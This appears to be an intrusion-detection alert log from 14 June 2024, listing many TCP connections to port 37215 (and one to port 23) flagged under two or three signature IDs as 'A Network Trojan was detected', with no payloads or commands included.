                Timestamp:06/14/24-10:43:45.966358
                SID:2829579
                Source Port:41830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777260
                SID:2829579
                Source Port:52840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813351
                SID:2829579
                Source Port:43878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505002
                SID:2829579
                Source Port:41956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734668
                SID:2835222
                Source Port:59602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368237
                SID:2835222
                Source Port:44860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163454
                SID:2829579
                Source Port:38136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277106
                SID:2835222
                Source Port:42304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412368
                SID:2829579
                Source Port:44580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879661
                SID:2835222
                Source Port:48358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763305
                SID:2829579
                Source Port:39424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181888
                SID:2829579
                Source Port:58632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985056
                SID:2835222
                Source Port:52948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143270
                SID:2829579
                Source Port:50240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564939
                SID:2829579
                Source Port:57402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178109
                SID:2829579
                Source Port:40622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779871
                SID:2835222
                Source Port:51552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979759
                SID:2829579
                Source Port:41630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679159
                SID:2835222
                Source Port:50194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503821
                SID:2835222
                Source Port:46104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.320972
                SID:2835222
                Source Port:42766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424417
                SID:2835222
                Source Port:38940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762600
                SID:2835222
                Source Port:53848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.385691
                SID:2829579
                Source Port:38142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132350
                SID:2835222
                Source Port:58412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646156
                SID:2835222
                Source Port:60064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325616
                SID:2829579
                Source Port:37088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451462
                SID:2835222
                Source Port:44826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829107
                SID:2835222
                Source Port:40796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028854
                SID:2829579
                Source Port:34118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411319
                SID:2829579
                Source Port:43194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366992
                SID:2829579
                Source Port:35862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718612
                SID:2829579
                Source Port:52830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675404
                SID:2835222
                Source Port:54138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624880
                SID:2835222
                Source Port:34000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383850
                SID:2829579
                Source Port:45414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660692
                SID:2829579
                Source Port:46224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017349
                SID:2835222
                Source Port:34746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367489
                SID:2835222
                Source Port:33996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616147
                SID:2829579
                Source Port:44082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667118
                SID:2835222
                Source Port:33908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451860
                SID:2829579
                Source Port:49800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857683
                SID:2835222
                Source Port:59988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517398
                SID:2835222
                Source Port:32872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.569321
                SID:2835222
                Source Port:58274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917827
                SID:2835222
                Source Port:51548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013474
                SID:2829579
                Source Port:43794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321514
                SID:2829579
                Source Port:53146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965853
                SID:2835222
                Source Port:45578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160684
                SID:2829579
                Source Port:59508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367083
                SID:2829579
                Source Port:60814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.070798
                SID:2835222
                Source Port:56880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325448
                SID:2829579
                Source Port:56208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564635
                SID:2829579
                Source Port:52558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828593
                SID:2829579
                Source Port:35402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943765
                SID:2835222
                Source Port:55830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054791
                SID:2835222
                Source Port:52830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943708
                SID:2829579
                Source Port:34190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384470
                SID:2835222
                Source Port:44024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849012
                SID:2835222
                Source Port:43852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322805
                SID:2829579
                Source Port:50590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053763
                SID:2829579
                Source Port:53434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831251
                SID:2829579
                Source Port:41840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501697
                SID:2829579
                Source Port:39700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148115
                SID:2829579
                Source Port:57002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275104
                SID:2829579
                Source Port:44788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164392
                SID:2835222
                Source Port:50162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789297
                SID:2835222
                Source Port:37040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179527
                SID:2829579
                Source Port:49436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053895
                SID:2835222
                Source Port:45642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677750
                SID:2829579
                Source Port:47376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321746
                SID:2829579
                Source Port:50060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806496
                SID:2829579
                Source Port:50268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677365
                SID:2829579
                Source Port:40918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276057
                SID:2829579
                Source Port:33578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761560
                SID:2829579
                Source Port:43112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052725
                SID:2835222
                Source Port:46794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230697
                SID:2829579
                Source Port:38048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338602
                SID:2835222
                Source Port:43394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.566614
                SID:2829579
                Source Port:43378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321698
                SID:2829579
                Source Port:41236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324296
                SID:2835222
                Source Port:51142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732941
                SID:2829579
                Source Port:34774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544835
                SID:2829579
                Source Port:56342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.336677
                SID:2829579
                Source Port:56614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811765
                SID:2835222
                Source Port:50810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917889
                SID:2829579
                Source Port:60978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321836
                SID:2829579
                Source Port:50254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761827
                SID:2829579
                Source Port:38244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291116
                SID:2835222
                Source Port:54164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687170
                SID:2829579
                Source Port:41554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384220
                SID:2829579
                Source Port:35168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942509
                SID:2835222
                Source Port:45504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.226110
                SID:2840515
                Source Port:59452
                Destination Port:23
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968611
                SID:2835222
                Source Port:55098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646746
                SID:2829579
                Source Port:52170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827898
                SID:2835222
                Source Port:47526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715540
                SID:2835222
                Source Port:46776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519856
                SID:2829579
                Source Port:52538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847757
                SID:2835222
                Source Port:35600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245658
                SID:2835222
                Source Port:52616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369216
                SID:2835222
                Source Port:51326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341089
                SID:2835222
                Source Port:53120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520609
                SID:2835222
                Source Port:52652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998492
                SID:2829579
                Source Port:35952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025734
                SID:2829579
                Source Port:60576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453139
                SID:2829579
                Source Port:51684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829170
                SID:2835222
                Source Port:40726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812914
                SID:2835222
                Source Port:59226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053672
                SID:2829579
                Source Port:58298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790086
                SID:2835222
                Source Port:54612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146266
                SID:2835222
                Source Port:33758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.162293
                SID:2835222
                Source Port:60518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860995
                SID:2835222
                Source Port:59312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616160
                SID:2829579
                Source Port:60500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618521
                SID:2835222
                Source Port:33278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986456
                SID:2829579
                Source Port:48930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143572
                SID:2829579
                Source Port:37386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419973
                SID:2835222
                Source Port:33610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014196
                SID:2829579
                Source Port:42964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023263
                SID:2835222
                Source Port:37080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789880
                SID:2829579
                Source Port:43530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201072
                SID:2829579
                Source Port:58014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715747
                SID:2835222
                Source Port:56996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762909
                SID:2829579
                Source Port:51102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472497
                SID:2835222
                Source Port:37766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408013
                SID:2829579
                Source Port:39746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245613
                SID:2829579
                Source Port:34826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290211
                SID:2835222
                Source Port:40080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965318
                SID:2835222
                Source Port:48834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679005
                SID:2829579
                Source Port:38572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407024
                SID:2835222
                Source Port:42340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614445
                SID:2835222
                Source Port:36760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074628
                SID:2835222
                Source Port:57516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934625
                SID:2829579
                Source Port:52208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182956
                SID:2835222
                Source Port:44698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735304
                SID:2829579
                Source Port:35762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227756
                SID:2835222
                Source Port:38258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942448
                SID:2835222
                Source Port:52792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230049
                SID:2829579
                Source Port:47692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245208
                SID:2829579
                Source Port:56136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684277
                SID:2835222
                Source Port:46206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766883
                SID:2835222
                Source Port:51814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766994
                SID:2835222
                Source Port:37932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968903
                SID:2835222
                Source Port:53084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111518
                SID:2829579
                Source Port:51668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053711
                SID:2835222
                Source Port:47732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185619
                SID:2835222
                Source Port:37818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228075
                SID:2829579
                Source Port:42146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469646
                SID:2829579
                Source Port:53458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449381
                SID:2829579
                Source Port:57766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661802
                SID:2829579
                Source Port:39392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969028
                SID:2835222
                Source Port:40764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849887
                SID:2829579
                Source Port:35300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146878
                SID:2829579
                Source Port:53594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111305
                SID:2835222
                Source Port:44822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178863
                SID:2829579
                Source Port:33618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501737
                SID:2829579
                Source Port:36972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032922
                SID:2829579
                Source Port:49536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671114
                SID:2829579
                Source Port:52272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423570
                SID:2835222
                Source Port:60316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022097
                SID:2835222
                Source Port:51460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999768
                SID:2829579
                Source Port:60116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808082
                SID:2835222
                Source Port:44394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669404
                SID:2835222
                Source Port:49330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111973
                SID:2835222
                Source Port:58150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504355
                SID:2835222
                Source Port:58822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791664
                SID:2829579
                Source Port:57054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134090
                SID:2829579
                Source Port:43668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565938
                SID:2835222
                Source Port:52338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185718
                SID:2829579
                Source Port:43734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293187
                SID:2835222
                Source Port:41278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807629
                SID:2835222
                Source Port:45436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803505
                SID:2829579
                Source Port:45208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133466
                SID:2829579
                Source Port:49192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410351
                SID:2829579
                Source Port:34954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022274
                SID:2835222
                Source Port:35554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057118
                SID:2835222
                Source Port:53078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985025
                SID:2829579
                Source Port:42514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548284
                SID:2829579
                Source Port:36332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.252964
                SID:2829579
                Source Port:48462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.147119
                SID:2835222
                Source Port:37720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382631
                SID:2829579
                Source Port:46284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617511
                SID:2829579
                Source Port:43042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.904919
                SID:2829579
                Source Port:33470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274480
                SID:2835222
                Source Port:56764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967834
                SID:2835222
                Source Port:44464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340295
                SID:2829579
                Source Port:41406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295129
                SID:2835222
                Source Port:49216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763571
                SID:2829579
                Source Port:55456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053994
                SID:2829579
                Source Port:34908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724249
                SID:2835222
                Source Port:42128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341831
                SID:2829579
                Source Port:34260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273764
                SID:2829579
                Source Port:35358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761340
                SID:2835222
                Source Port:39846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276514
                SID:2829579
                Source Port:50944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806052
                SID:2835222
                Source Port:49848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470549
